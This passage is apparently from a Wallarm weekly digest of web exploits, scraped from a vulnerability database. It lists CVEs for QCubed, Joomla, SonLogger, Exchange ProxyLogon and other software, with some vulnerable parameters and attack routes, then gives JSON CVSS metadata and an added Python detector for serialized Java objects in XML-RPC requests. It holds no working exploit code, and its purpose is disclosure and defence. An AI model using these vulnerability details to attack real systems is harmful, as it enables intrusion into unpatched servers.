*\n\n2021-03-12 \n**[QCubed 3.1.1 PHP Object Injection](<https://vulners.com/packetstorm/PACKETSTORM:161758>) \nScore: CVSS 7.5 \nType: PHP Object Injection \n[CVE-2020-24914](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-24914>)**\n\nA PHP object injection bug in profile.php in qcubed (all versions including 3.1.1) unserializes the untrusted data of the POST-variable \u201cstrProfileData\u201d and allows an unauthenticated attacker to execute code remotely via a crafted POST request.\n\n* * *\n\n2021-03-12 \n**[QCubed 3.1.1 SQL Injection](<https://vulners.com/packetstorm/PACKETSTORM:161759>) \nScore: CVSS 7.5 \nType: SQL Injection \n[CVE-2020-24913](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-24913>)**\n\nAn SQL injection vulnerability in qcubed (all versions including 3.1.1) in profile.php 
via the strQuery parameter allows an unauthenticated attacker to access the database by injecting SQL code via a crafted POST request. As a result, an unauthenticated attacker can get access the database remotely. In worst-case scenarios, an attacker might be able to execute code on the remote machine.\n\n* * *\n\n2021-03-08 \n**[Joomla JCK Editor 6.4.4 SQL Injection](<https://vulners.com/packetstorm/PACKETSTORM:161683>) \nScore: CVSS 7.5 \nType: SQL Injection \n[CVE-2018-17254](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-17254>)**\n\n* * *\n\n2021-03-15 \n**[SonLogger 4.2.3.3 Shell Upload (Unauthenticated Arbitrary File Upload)](<https://vulners.com/packetstorm/PACKETSTORM:161793>) \nScore: CVSS 7.5 \nType: File upload \n[CVE-2021-27964](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27964>) \nMetasploit +**\n\n* * *\n\n**[Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon)](<https://vulners.com/exploitdb/EDB-ID:49637>) \nScore: CVSS 7.5 \nType: SSRF \n[CVE-2021-27065](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27065>) \n[CVE-2021-26855](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855>)**\n\n* * *\n\n2021-03-12 \n**[QCubed 3.1.1 Cross Site Scripting](<https://vulners.com/packetstorm/PACKETSTORM:161763>) \nScore: CVSS 7.5 \nType: XSS \n[CVE-2020-24912](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24912>)**\n\n* * *\n\n2021-03-12 \n**[ForkCMS PHP Object Injection](<https://vulners.com/packetstorm/PACKETSTORM:161764>) \nScore: CVSS 6.5 \nType: PHP Object Injection \n[CVE-2020-24036](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-24036>)**\n\n* * *\n\n2021-03-10 \n**[Atlassian JIRA 8.11.1 User Enumeration](<https://vulners.com/packetstorm/PACKETSTORM:161730>) \nScore: CVSS 6.1 \nType: Enumeraion \n[CVE-2020-14181](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14181>)**\n\nThe post [Web vulnerabilities exploit weekly digest #1. March 8-15th 2021. 
VMware vCenter and Apache OFBiz RCE.](<https://lab.wallarm.com/web-vulnerabilities-exploits-weekly-digest-1-march-8-15th-2021-vmware-vcenter-and-apache-ofbiz-rce/>) appeared first on [Wallarm](<https://lab.wallarm.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-16T18:22:00", "type": "wallarmlab", "title": "Web vulnerabilities exploit weekly digest #1. March 8-15th 2021. VMware vCenter and Apache OFBiz RCE.", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-6576", "CVE-2018-17254", "CVE-2020-14181", "CVE-2020-24036", "CVE-2020-24912", "CVE-2020-24913", "CVE-2020-24914", "CVE-2020-7200", "CVE-2021-21972", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-27964"], "modified": "2021-03-16T18:22:00", "id": "WALLARMLAB:1493380EEC54B493CC22B4FA116139BB", "href": "https://lab.wallarm.com/web-vulnerabilities-exploits-weekly-digest-1-march-8-15th-2021-vmware-vcenter-and-apache-ofbiz-rce/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
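As an added defender-side example, not from the Wallarm post or the Metasploit module, the check below shows why inspecting raw request bytes is not enough for the OFBiz XML-RPC case discussed at the top of this digest: it lets the XML parser resolve character references and entities first, then strips the Base64 layer and looks for the Java serialization stream header. The request body is constructed for this example and carries only the 4-byte header plus filler, not a real gadget chain.

```python
import base64
import binascii
import xml.etree.ElementTree as ET

# Every Java serialization stream opens with STREAM_MAGIC 0xACED, STREAM_VERSION 0x0005.
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"


def find_serialized_java(xml_body: str) -> list:
    """Scan an XML-RPC body for <serializable> elements whose Base64 text
    decodes to a Java serialization stream.

    The XML parser resolves character references and entities before we
    see the text, so a payload split with "&#x42;"-style escapes is
    reassembled first; a pattern match over the raw bytes would miss it.
    Returns one (element_tag, decoded_length) tuple per hit.
    """
    hits = []
    try:
        root = ET.fromstring(xml_body)
    except ET.ParseError:
        return hits  # malformed XML: leave that to a separate rule
    for elem in root.iter():
        # Compare the local name so any prefix or default namespace matches.
        if elem.tag.rsplit("}", 1)[-1] != "serializable":
            continue
        try:
            raw = base64.b64decode((elem.text or "").strip())
        except (binascii.Error, ValueError):
            continue  # not Base64 at all; nothing to decode
        if raw.startswith(JAVA_SERIAL_MAGIC):
            hits.append((elem.tag, len(raw)))
    return hits


# Constructed sample request: the value is the serialization header followed by
# the filler bytes b"test" ("rO0ABXRlc3Q=" in Base64), with two characters
# re-encoded as XML character references to mimic the second encoding layer.
SAMPLE_REQUEST = """<?xml version="1.0"?>
<methodCall>
  <methodName>example</methodName>
  <params><param><value><struct><member>
    <name>data</name>
    <value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0A&#x42;XR&#x6C;c3Q=</serializable></value>
  </member></struct></value></param></params>
</methodCall>"""

if __name__ == "__main__":
    for tag, size in find_serialized_java(SAMPLE_REQUEST):
        print(f"Java serialization stream of {size} bytes in <{tag}>")
```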